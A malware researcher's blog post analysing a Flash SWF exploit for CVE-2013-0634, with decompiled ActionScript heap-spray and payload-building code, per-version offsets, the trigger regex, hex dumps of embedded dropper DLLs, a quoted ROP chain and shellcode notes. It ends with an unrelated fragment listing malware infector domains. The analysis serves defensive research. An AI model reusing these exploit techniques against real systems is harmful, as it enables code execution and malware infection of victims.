The method of flash.utils::ByteArray, following by flash.utils::Endian and the callpropvoid of writeInt to push the malicious Endian codes is the execution part of this exploitation. While before it we can find the usage of stack overflow by malicious codes like 0x41414141 and 0xFFFFFFF8 in the Flash Vector object formed, and the method of using textfield(with having the font parameter in it) to be filled with the vector object formed.

Strings used for exploitation is cleverly scattered between _local* variables, made us difficult to trace it by eyes, so by the help of debugger we can understand the flow.

I'm currently in the middle of separating exploit strings while writing this at the same time & trying to find the solid PoC of shellcode which still in process. Since the reference of exploit in this CVE is still not clear here and there (like some reference mentioning buffer overflow while other mentioning memory corruption) and also considering that new information is still keep on popping up, thus the lack of analysis sample of CVE-2013-0634 SWF file itself (so far I found only ONE "suspected" sample of CVE-2013-0634 posted in VT), made me think to have a break for a while and taking liberty to split the post into parts (1 and 2) make updates in the related topic.

The Sample

New information:
The VT sample "ieee2013.swf" w/hash: bf29f7d83580b4b4355dbc8a82b4972aWAS NOT the CVE-2013-0634,but CVE-2013-0633 embedded swf, #AFatBigLie
— Hendrik ADRIAN (@unixfreaxjp) February 13, 2013

As per advised I took liberty to choose sample posted in VirusTotal -->>[URL], 
and I picked the recent one with the below details:
Sample : ieee2013.swf
MD5    : bf29f7d83580b4b4355dbc8a82b4972a
SHA256 : 19a5e24e8c90e2d7f65729455c3fd8b89ebbfdc8d218db3ab4a3193100106267
File size: 498.8 KB ( 510762 bytes )
File name: ieee2013.swf
File type: Flash
Tags: exploit flash cve-2013-0634
Detection ratio: 12 / 45
Analysis date: 2013-02-08 19:32:42 UTC ( 17 hours, 20 minutes ago )
Malware names:
F-Secure                 : Dropped:Trojan.Agent.AYAF
DrWeb                    : Exploit.CVE2013-0633.1
GData                    : Dropped:Trojan.Agent.AYAF
Norman                   : Shellcode.E
McAfee-GW-Edition        : Heuristic.BehavesLike.Exploit.Flash.CodeExec.O
MicroWorld-eScan         : Dropped:Trojan.Agent.AYAF
Avast                    : Win32:Malware-gen
nProtect                 : Dropped:Trojan.Agent.AYAF
BitDefender              : Dropped:Trojan.Agent.AYAF
McAfee                   : Exploit-CVE2013-0633
ESET-NOD32               : SWF/Exploit.CVE-2013-0634.A
Microsoft                : Exploit:SWF/CVE-2013-0634
At the time I choosed, it was so convincing.. But during analyzing the sample deeper it turned out fakes.. 
Updates - 2013, Feb 26, just before midnight..Eric Romang (@eromang) found CVE-2013-0634 in the wild spread by  Gong Da(d) Exploit Kit, which can be read in his report here -->>[HERE]The sample he uploaded into Virus Total in here -->>[VIRUS-TOTAL]And I confirmed it as the same code as we posted in this post. Snapshot of the codes is: So this is the hard evidence for this exploit that infects in the wild.  For the research purpose, you may confirm yourself here -->>[HERE]I thank Eric Romang for the sharing the information that we must aware of! 
#Exploit Info -@eromang found #CVE-2013-0634 spread In The Wild!! sample is: virustotal.com/en/file/83406e…#TruthRevealedtwitter.com/unixfreaxjp/st…
— Hendrik ADRIAN (@unixfreaxjp) February 26, 2013
Understanding the Structure
It is good to visualize the structure of swf sample. I use Action Script for this purpose, this sample looks like below:  We need to break it down now, using SWF dumper tool to see the format: 
 * Total # of File Tags: 88
 * End (0) -- total: 1
 * ScriptLimits (65) -- total: 1
 * DoABC2 (82) -- total: 1
 * ShowFrame (1) -- total: 1
 * FileAttributes (69) -- total: 1
"* DefineBinaryData (87) -- total: 2 <==w00t"
 * SetBackgroundColor (9) -- total: 1
 * ProductInfo (41) -- total: 1
 * FrameLabel (43) -- total: 1
 * SymbolClass (76) -- total: 1
 * Metadata (77) -- total: 1
↑so we HAVE two binaries embedded from the beginning.  Viewing the  meta data we know it fakes "Adobe Flex 4 Application" 
＜Metadata＞
＜rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'＞
＜rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/elements/1.1'＞
＜dc:format＞application/x-shockwave-flash＜/dc:format＞
＜dc:title＞Adobe Flex 4 Application＜/dc:title＞
＜dc:description＞http://www.adobe.com/products/flex＜/dc:description＞
＜dc:publisher＞unknown＜/dc:publisher＞
＜dc:creator＞unknown＜/dc:creator＞
＜dc:language＞EN＜/dc:language＞
＜dc:date＞Feb 4, 2013＜/dc:date＞
＜/rdf:Description＞＜/rdf:RDF＞
＜/Metadata＞
I tend to check SWF timestamp in product info: 
＜ProductInfo product='Adobe Flex' edition='' 
  version='4.6' build='23201' 
  compileDate='Tue Feb 5 00:56:14 2013 UTC'/＞
Checking the SymbolClass: 
＜SymbolClass＞
＜Symbol idref='1' className='LadyBoyｌe_the_x32_Class' /＞
＜Symbol idref='2' className='LadyBoｙle_the_x64_Class' /＞
＜Symbol idref='0' className='LadyBoyle' /＞
＜/SymbolClass＞
↑You'll see the classes with the string of x32 and x64 in there..  These are binary tags: 
＜DefineBinaryData id='1' idrefName='LadyBoyle_the_x32_Class' length='247296' /＞
＜DefineBinaryData id='2' idrefName='LadyBoyle_the_x64_Class' length='246272' /＞
So let's confirm whether the embedded binaries are really there,  if so let's figure its type.  Recheck by hex of the symbol class part.. to double check... 
3f 13 42 00 00 00 03 00 01 00 4c 61 64 79 42 6f | ?*B*******LadyBo |
79 6c 65 5f 74 68 65 5f 78 33 32 5f 43 6c 61 73 | yle_the_x32_Clas |
73 00 02 00 4c 61 64 79 42 6f 79 6c 65 5f 74 68 | s***LadyBoyle_th |
65 5f 78 36 34 5f 43 6c 61 73 73 00 00 00 4c 61 | e_x64_Class***La |
64 79 42 6f 79 6c 65 00                         | dyBoyle*         |
OK looks binaries are there..to be sure, let's dump and see it.. Here's the x32 first block... 
ff 15 06 c6 03 00 01 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c 49 48 4c | .***$*******|IHL |
38 28 26 1f 38 28 26 1f 38 28 26 1f 31 50 a2 1f | 8(&*8(&*8(&*1P** |
21 28 26 1f 31 50 b3 1f 28 28 26 1f 31 50 a5 1f | !(&*1P**((&*1P** |
70 28 26 1f 1f ee 5d 1f 3b 28 26 1f 38 28 27 1f | p(&***]*;(&*8('* |
77 28 26 1f 31 50 ac 1f 3b 28 26 1f 31 50 b7 1f | w(&*1P**;(&*1P** |
39 28 26 1f 52 69 63 68 38 28 26 1f 00 00 00 00 | 9(&*Rich8(&***** |
00 00 00 00 50 45 00 00 4c 01 05 00 fc 40 10 51 | ****PE**L****@*Q |
00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 | ***********!**** |
00 66 00 00 00 5c 03 00 00 00 00 00 d6 13 00 00 | *f***\********** |
And the second one...x64 binary (1st block snipped) 
ff 15 06 c2 03 00 02 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 25 09 b1 | .***$********%** |
e0 44 67 e2 e0 44 67 e2 e0 44 67 e2 e9 3c e3 e2 | *Dg**Dg**Dg**<** |
f9 44 67 e2 e9 3c e4 e2 a4 44 67 e2 e9 3c f2 e2 | *Dg**<***Dg**<** |
e9 44 67 e2 c7 82 1c e2 e5 44 67 e2 e0 44 66 e2 | *Dg******Dg**Df* |
b2 44 67 e2 e9 3c ed e2 e3 44 67 e2 e9 3c f6 e2 | *Dg**<***Dg**<** |
e1 44 67 e2 52 69 63 68 e0 44 67 e2 00 00 00 00 | *Dg*Rich*Dg***** |
00 00 00 00 50 45 00 00 64 86 06 00 fa 40 10 51 | ****PE**d****@*Q |
00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 | **********" **** |
by experience I know both are the DLL files..  
Code Analysis
All of the variables prepared for exploitation always appears in pairs.. for example like below, suggested different methods used for x32 & x64: 
(_local5[_local7][_local22] as Vector. < Number > )[17] = this.UintToDouble(0xFFFFFFFF, _local9);
(_local5[_local7][_local22] as Vector. < Number > )[18] = this.UintToDouble(0x41414141, 0);
Despite the pairing scheme, also spotted "generic" code scheme i.e.:  Checking the exact version of Windows OS: 
switch (_local19) ｛   
ｃase "windows 7":
        break;    
    caｓe "windows server 2008 r2":        
        break;    
    caｓe "windows server 2008":        
        break;    
ｃase "windows server 2003 r2":        
        break;    
ｃase "windows server 2003":        
        break;    
ｃase "windows xp":        
        break;    
ｃase "windows vista":        
        break;    
ｄefault:        
        return (this.empty());  ｝;        
It scattered exploit strings into some value of integer with _local%n names,  it checked the Windows OS's flash player version &  allocate different integer value if flash player contains  playertype=activex (see below), ...and... 
switch (_local27) ｛
    case "win 11,5,502,146":
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛  
            _local25 = (_local16 - 1838536);                       
            _local26 = (_local16 - 574720);                                ｝;            
        break;        
    case "win 11,5,502,135":        
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛    
            _local25 = (_local16 - 2266027);        
            _local26 = (_local16 - 574864);                    ｝;            
        break;        
    case "win 11,5,502,110":        
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛    
            _local25 = (_local16 - 1600110);        
            _local26 = (_local16 - 574424);                    ｝;            
        break;        
    case "win 11,4,402,287":        
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛    
            _local25 = (_local16 - 4624790);        
            _local26 = (_local16 - 574196);                    ｝;            
        break;        
    case "win 11,4,402,278":        
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛    
            _local25 = (_local16 - 1227937);        
            _local26 = (_local16 - 573876);                    ｝;            
        break;        
    case "win 11,4,402,265":        
        if (capabilities.playertype.tolowercase() ＝＝ "activex") ｛    
            _local25 = (_local16 - 7925883）;        
            _local26 = (_local16 - 573876);                    ｝;            
        break;
.. then preparing bigger init value for flash without activeX...         
default:  
    (_local5[_local7][_local22] as Vector. ＜ Number ＞ )[536870911] = this.UintToDouble(16, _local9);        
    return;  ｝;     
The other part of exploit values are implemented into other "_local*"  variables in seperated section as per I pasted it here -->>[HERE][Additional] As so many other researchers also already noticed,  it is spotted the regex operation suspected the direct exploitation by it. Actually I wanted to expose this after getting more info,  but OK, since so many questions came.. here we go:  It filled a var with this regex string & assigned it to RegExp: 
_local2 = "(?i)()()(?-i)||||||||||||||||||||||";
var _local20: RegExp = new RegExp(_local2, "");
To be used in the operation in forming object of exploitation: Why this regex was used? We saw it to be used as per it is.. To grep the pattern defined, PoC the debug code: 
3509 pushstring     "(?i)()()(?-i)||||||||||||||||||||||"
3512 findpropstrict RegExp //nameIndex = 66
3517 constructprop  RegExp (2) //nameIndex = 66
3520 coerce         RegExp //nameIndex = 66
And the memory snapshot below: 
0a 77 69 6e 64 6f 77 73 20 78 70 0d 77 69 6e 64| *windows xp*wind |
6f 77 73 20 76 69 73 74 61 0c 66 72 6f 6d 43 68| ows vista*fromCh |
61 72 43 6f 64 65 06 52 65 67 45 78 70 23 28 3f| arCode*RegExp#(? |
69 29 28 29 28 29 28 3f 2d 69 29 7c 7c 7c 7c 7c| i)()()(?-i)||||| |
7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c| |||||||||||||||| |
7c 06 6c 65 6e 67 74 68 10 77 72 69 74 65 55 6e| |*length*writeUn |
73 69 67 6e 65 64 49 6e 74 0a 70 6c 61 79 65 72| signedInt*player |
54 79 70 65 07 61 63 74 69 76 65 78 05 66 6c 75| Type*activex*flu |
73 68 0a 77 72 69 74 65 42 79 74 65 73 05 45 72| sh*writeBytes*Er |
72 6f 72 01 65 0c 66 6c 61 73 68 2e 65 76 65 6e| ror*e*flash.even |
74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68| ts*EventDispatch |
65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| er*DisplayObject |
11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65| *InteractiveObje |
63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| ct*DisplayObject |
43 6f 6e 74 61 69 6e 65 72 1a 16 01 16 05 16 08| Container******* |
↑At the time regex executed, it runs w/o crash. So if RegEXP aka regex value of "(?i)()()(?-i)||||||||||||||||||||||" has anything to do with the direct exploitation is still a question to me. The exploitation happened at the time the texfield filled with the malicios vector contains the exploit bit (in my case). That's why I desperately need to seek other samples or better memory shot to be sure of this regex method, & reason why I did not  write it before too.  [NEW ADDITIONAL]  The usage of the regex which functioned as the trigger to the  overall exploitation is explained by HaifeiLi -->>[HERE] Let's continue: The _local5 array contains vector ＜number＞ and ＜object＞ and the below checkpoints was making sure of it if we follow it further the _local5 will be used by additional hard-coded bits: Next.. depends on the processor type it assembled the strings by - using writeUnsignedInt. This is that code for x32... 
// initiation of the bins.. see the 0x41 0x41 0x41 starts..
while (_local1 < (0x0400 * 100)) {
    _local17.writeUnsignedInt(0x41414141）;
    _local1++;
};

// transfering the result to other vars...
_local12 = (_local12 + _local17.position);
_local14 = _local17.position;


// building the x32 exploit here...with the Unsigned interger flood...
 _local17.endian = Endian.LITTLE_ENDIAN;
 _local34 = _local17.position;
 _local17.position = (_local17.position + 224);
 _local17.writeUnsignedInt(_local25);
 _local17.position = _local34;
 _local17.position = (_local17.position + 160);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.position = _local34;
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(64);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local39);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local17.position + 40);
 _local17.writeUnsignedInt(_local36);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.writeUnsignedInt(_local38);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(0x2000);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local26);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local40);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local34 + 0x0100);
 _local17.writeUnsignedInt(1442615440);
 _local17.writeUnsignedInt(4041507656);
              :
              :(snipped)
And this is for x64... 
_local17.writeBytes(_local35, 0, _local35.length);
_local12 = _local13;
_local15 = ((((_local12 + 128) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local15 = ((((_local12 + 16) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = (_local12 + _local14);
_local17.position = _local14;                   

//// Buiding x64 exploit, 
_local34 = _local17.position;
_local17.position = (_local17.position + 224);
_local17.writeUnsignedInt(_local25);
_local17.position = _local34;
_local17.position = (_local17.position + 160);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.writeUnsignedInt(_local31);
_local17.position = _local34;
_local17.writeUnsignedInt(_local37);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(64);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(_local39);
_local17.writeUnsignedInt(0);
_local17.position = (_local17.position + 40）;
_local17.writeUnsignedInt(_local36);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt((_local12 + 0x0100)）;
_local17.writeUnsignedInt(_local31);
_local17.writeUnsignedInt(_local38);
              :
_local17.writeUnsignedInt(0);
_local17.position = (_local34 + 0x0100);
_local17.writeUnsignedInt(1442615440）;
_local17.writeUnsignedInt(4041507656）;
_local17.writeUnsignedInt(1708274504）;
              :
              :(snipped)
The _local17 above was filled by values of vector objects filled by  the logic of Random → Vector flood by ByteArray → formed into function  ReadDouble to be used to form exploit object,  flow details is--->>[HERE]Please be noted the usage of hard coded bit 0x41414141 in the vector object  and usage of 0xFFFFFFF8 for gaining heap allocation/deallocation is used. Correction:0xFFFFFFF8 is used to convert 0x*******1 to 0x*******0 which is the correct  address for exploit. ) ←Thank's to @promised_lu for pointing this :-) PS: I still can't figure why the hardcoded 0x41414141 bit is there...  The usage of text field with font to be filled by exploit values  aiming for the overflow was also detected: 

function empty(): void ｛
" var _local1: textfield = new textfield();"
  _local1.autosize = TextFieldAutoSize.left;
   var _local2: textformat = new textformat();
  _local2.size = 30;
  _local2.font = "Arial";
  _local2.color = 0xFF0000;
"  _local1.settextformat(_local2);"
  _local1.text = " ";
" addChild(_local1);"
After exploit form is built, it went into an execution of part of  the forming code the object which in the debug code can be viewed below: 
0    getlocal0      
1    pushscope      
2    findpropstrict flash.utils::ByteArray //nameIndex = 19
4    constructprop  flash.utils::ByteArray (0) //nameIndex = 19
7    coerce         flash.utils::ByteArray //nameIndex = 19
9    setlocal3      
10   getlocal3      
11   getlex         flash.utils::Endian //nameIndex = 40
13   getproperty    LITTLE_ENDIAN //nameIndex = 41
15   setproperty    endian //nameIndex = 42
17   getlocal3      
18   getlocal1      
19   callpropvoid   writeInt (1) //nameIndex = 43
22   getlocal3      
23   getlocal2      
24   callpropvoid   writeInt (1) //nameIndex = 43
↑It means: using the flash.utils::ByteArray to write integer as little  endian (I call this stream-out referred to Adobe API = "extracting") ..to WriteIntvalues as per mixed in hex-->>[HERE](need to split these in two for x32 and x64.. a lot ow work to do..) ..to then execute process below: 
25   pushbyte       0
26   setproperty    position //nameIndex = 44
27   getlocal3      
28   callproperty   readDouble (0) //nameIndex = 45
29   returnvalue    
..at this point the return for value pointing LadyBoyle x32 OR x64 binary Class  (the code is below) 
    import mx.core.*;
    public class LadyBoyle_the_x32_Class extends ByteArrayAsset {
↑for the x32 ..and for the x64↓ 
    import mx.core.*;
    public class LadyBoyle_the_x64_Class extends ByteArrayAsset {
to extract the embedded object as per described here -->>[AdobeAPIPage]The complete decompilation code of the SWF of CVE-2013-6034 in neutralized code is here -->>[PASTEBIN]
The debug..
It's time to run this swf in debug mode.. like a binary analysis I want  to capture everything I could. The (long) complete debug main init trace list is here --->>[HERE]See how it ends up to point classes of the_x32_Class:Class or the_x64_Class:Class  You also can grep the "pushint" to grep all of the pushed value related codes - for the x32 and x64 -->>[HERE]If we divided it right we may slit the value of x32 and x64. (on it..)You can compare those strings with the memory snapshot here --->>[HERE]The dump binary can be downloaded here -->>[HERE] Since the code initiate the 32 & 64 bit as detailed classes↓... 
this.the_x32_Class = LadyBoyle_the_x32_Class;
this.the_x64_Class = LadyBoyle_the_x64_Class;
...and the below are the trace of execution of LadyBoyle by of 32/64 bit to get the binary object embedded. For 32bit: 
init():* 
// disp_id=0 method_id=15 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3689 code position=16442 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x32_Class //nameIndex = 80 
 4      getlex         Object //<--- nameIndex = 54  
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x32_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x32_Class //nameIndex = 21 
 22     returnvoid      
The 64bit.. 
init():* 
// disp_id=0 method_id=18 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3701 code position=16498 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x64_Class //nameIndex = 81 
 4      getlex         Object // <----nameIndex = 54 
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x64_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x64_Class //nameIndex = 22 
 22     returnvoid      
The getlex for objects→ByteArray→ByteArrayAsset→is calling embedded  "LadyBoyle" class contains malware DLL binary to be extracted in the victim's PC.. [Additional-2] @promised_lu, the author of pmswalker was making a very good reversing for the this exploit sample which exposing security baypass' ROP Chain & SHELLCODE formed during exploitation. You can see his good analysis here -->>[LINK] This is VERY important chain that I was looking for from beginning the existance of the shellcode which explained the below operations: Searching for %Temp% path and load a library, as per below: 
   :
069442C2 FFE0  jmp     eax        
; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg", 
               GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL) =>
; LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg")
With noted that shellcode use of stackpivot restore the stack back to the  normal flow of execution to prevent the crash.   He also reversed the abc.cfg executed as libs via shellcode: 
     :
 *(_DWORD *)p2 = dword_10009278;             // 'cces'
 *((_DWORD *)p2 + 1) = dword_1000927C;       // 'etne'
 *((_DWORD *)p2 + 2) = dword_10009280;       // 'xx.r'
 *((_WORD *)p2 + 6) = word_10009284;         // 'x'
    :
↑which explaining the dropping of seccetnter.xxx payload.  All of the above is possible since the ALSR and DEP are bypassed, and he explianed the ROP Chain for it as per quoted below: 
06944000  7C809AE1  kernel32.VirtualAlloc
06944004  06944088  /CALL to VirtualAlloc
06944008  06944000  |Address = 06944000
0694400C  00002000  |Size = 2000 (8192.)
06944010  00001000  |AllocationType = MEM_COMMIT
06944014  00000040  \Protect = PAGE_EXECUTE_READWRITE
#w00t to @promised_lu :-) good job!  This solves the all mistery of this exploitation, conclusion: 
The usage of hardcoded bits, details in address calculation, using the heap spray with the changes of stack value (stackpivot), with the ROP of by passing ASLR and DEP is a VERY sophisticated technique to be used in this exploitation. The technique exploitation of this sample is proven to be Memory Corruption base of the exploitation.
Research Material & Samples
For raising AV detection rates & research purpose, sample-->>[HERE]The SWF's embedded DLL malwares is having the below VT ratio: 
SHA256:    d6459e851fda540159a78aa901b46cc2e921c57952e961edf4d817b4f5a82f14 SHA1:      c6bff71c4c9ac92f78995ac9097f8cc13779a8fc MD5:       b4da1c3400b48803b41823feaf6085e8 File size: 241.5 KB ( 247296 bytes ) File name: CVE-2013-0634-x32bin.drop.dll File type: Win32 DLL Tags:      exploit cve-2013-0634 pedll Ratio:     21 / 41 Date:      2013-02-10 17:48:27 UTC ( 37 minutes ago ) URL ---->>[CLICK] F-Secure                 : Dropped:Trojan.Agent.AYAF GData                    : Dropped:Trojan.Agent.AYAF VIPRE                    : Trojan.Win32.Generic!BT Symantec                 : Trojan Horse ESET-NOD32               : Win32/TrojanDropper.Agent.QAU McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.PasswordStealer.H Fortinet                 : W32/Agent.QAU!tr TrendMicro-HouseCall     : TROJ_GEN.R11H1B8 MicroWorld-eScan         : Dropped:Trojan.Agent.AYAF Avast                    : Win32:Malware-gen nProtect                 : Dropped:Trojan.Agent.AYAF Kaspersky                : Trojan.Win32.Delf.dedq BitDefender              : Dropped:Trojan.Agent.AYAF McAfee                   : BackDoor-FAKV!B4DA1C3400B4 Ikarus                   : Trojan.Win32.Bredolab Panda                    : Trj/CI.A AhnLab-V3                : Win-Trojan/Infostealer.247296 AntiVir                  : DR/Agent.AYAF PCTools                  : Trojan.Generic Sophos                   : Troj/Agent-ZUP Comodo                   : UnclassifiedMalware
SHA256:    b03623e4818e60869f67dba28ab09187782a4ae0f4539cef2c07634865f37e74 SHA1:      040069e5ecf1110f6634961b349938682fee2a22 MD5:       dbc7e219e9af297271ea594f0ff6ad12 File size: 240.5 KB ( 246272 bytes ) File name: CVE-2013-0634-x64bin.drop.dll File type: Win32 DLL Tags:      exploit cve-2013-0634 pedll Ratio:     17 / 46 Date:      2013-02-10 17:49:04 UTC ( 39 minutes ago ) URL ---->>[CLICK] F-Secure                 : Trojan.Generic.8698229 DrWeb                    : BackDoor.Poison.1033 GData                    : Trojan.Generic.8698229 VIPRE                    : Trojan.Win32.Generic!BT Norman                   : Killav.LB ESET-NOD32               : Win64/TrojanDropper.Agent.U TrendMicro-HouseCall     : TROJ_GEN.R47H1B9 MicroWorld-eScan         : Trojan.Generic.8698229 Avast                    : Win32:Malware-gen nProtect                 : Trojan.Generic.8698229 BitDefender              : Trojan.Generic.8698229 McAfee                   : BackDoor-AKV Panda                    : Trj/CI.A Ikarus                   : Win32.Malware AVG                      : Small.EWV Emsisoft                 : Malware.Win64.AMN (A) Comodo                   : UnclassifiedMalware
While trying to figure how the exploit execute the attached DLL, I took a video. and in one of the session I took the video from my Droid camera: 
Thank you very much for fellow researchers who encourage be to analyze this:  
@eromang @malwaremustdie shes not very nice
— Lance Brandy (@Lance37Brandy) February 9, 2013
False Positive Possibilities

I am so worry that if some security scanner will use the word "LadyBoyle" to grep & classify the detection of CVE-2013-0634, which exactly will NOT stop the infection of CVE-2013-0634 (since that is just a name of a "changeable" class inside an infector SWF file which I doubt that you can scan it online) BUT it will exactly will block this post to be viewed by public.

This post is dedicated to the security research, hopefully to be a useful reference of CVE-2013-0634, please kindly help to notice us in twitter if the false positive alarm happens. Thank you very much.

Additionals

The other Flash 0day found in the wild & used against Mac OS X (CVE-2013-0634) results from an integer overflow in CFF font handling #Flash

— VUPEN Security (@VUPEN) February 8, 2013

The mentioned "font method", or to be precised, in our case was the usage of textfield object (to be filled with exploit data) with setting .settextformat contains a font definition, indeed detected too in this post, but did not see any MacOSX target in my sample, so that must be same type of exploit yet a separately made. I wonder was it a only a MS Word's .doc file?

Reference

(Fine)

#MalwareMustDie!

Background

The spam driven credentials/PWS stealer group we track, that is known for infecting trojan to steal credential via Blackhole Exploit Exploit Kit, that is responsible to the infection of recent fake FedEx, fake Amazon ticket, fake BBB, fake American Express spams and so on, is recently making a brand new new campaign through the below "real" malware infector domains:

fuigadosi.ru (NEW)
faneroomk.ru (NEW)
fzukungda.ru (NEW)
famagatra.ru (NEW)
fulinaohps.ru (NEW)
finalions.ru (NEW)
emmmhhh.ru (NEW)
errriiiijjjj.ru (NEW)
ejjiipprr.ru  (NEW)
eiiiioovvv.ru (NEW)

"previous infector used historically:"
emaianem.ru
enakinukia.ru
exibonapa.ru
esigbsoahd.ru
egihurinak.ru
exiansik.ru
emaianem.ru
estipaindo.ru
epilarikko.ru
eminakotpr.ru
ewinhdutik.ru
efjjdopkam.ru
eipuonam.ru
epionkalom.ru
ejiposhhgio.ru
emalenoko.ru
eminakotpr.ru
  :

Tracing to fzukungda.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.fzukungda.ru [fzukungda.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns4.fzukungda.ru [fzukungda.ru] (203.171.234.53) Got authoritative answer
 |     |\___ ns3.fzukungda.ru [fzukungda.ru] (210.71.250.131) Got authoritative answer
 |     |\___ ns5.fzukungda.ru [fzukungda.ru] (184.106.195.200) *
 |      \___ ns1.fzukungda.ru [fzukungda.ru] (41.168.5.140) Got authoritative answer
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns1.fzukungda.ru [fzukungda.ru] (41.168.5.140) (cached)
 |     |\___ ns3.fzukungda.ru [fzukungda.ru] (210.71.250.131) (cached)
 |     |\___ ns4.fzukungda.ru [fzukungda.ru] (203.171.234.53) (cached)
 |     |\___ ns2.fzukungda.ru [fzukungda.ru] (110.164.58.250) (cached)
 |      \___ ns5.fzukungda.ru [fzukungda.ru] (184.106.195.200) *
 :                  :
Tracing to famagatra.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns4.famagatra.ru [famagatra.ru] (203.171.234.53) Got authoritative answer
 |     |\___ ns1.famagatra.ru [famagatra.ru] (41.168.5.140) Got authoritative answer
 |     |\___ ns5.famagatra.ru [famagatra.ru] (184.106.195.200) *
 |     |\___ ns2.famagatra.ru [famagatra.ru] (110.164.58.250) Got authoritative answer
 |      \___ ns3.famagatra.ru [famagatra.ru] (210.71.250.131) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns2.famagatra.ru [famagatra.ru] (110.164.58.250) (cached)
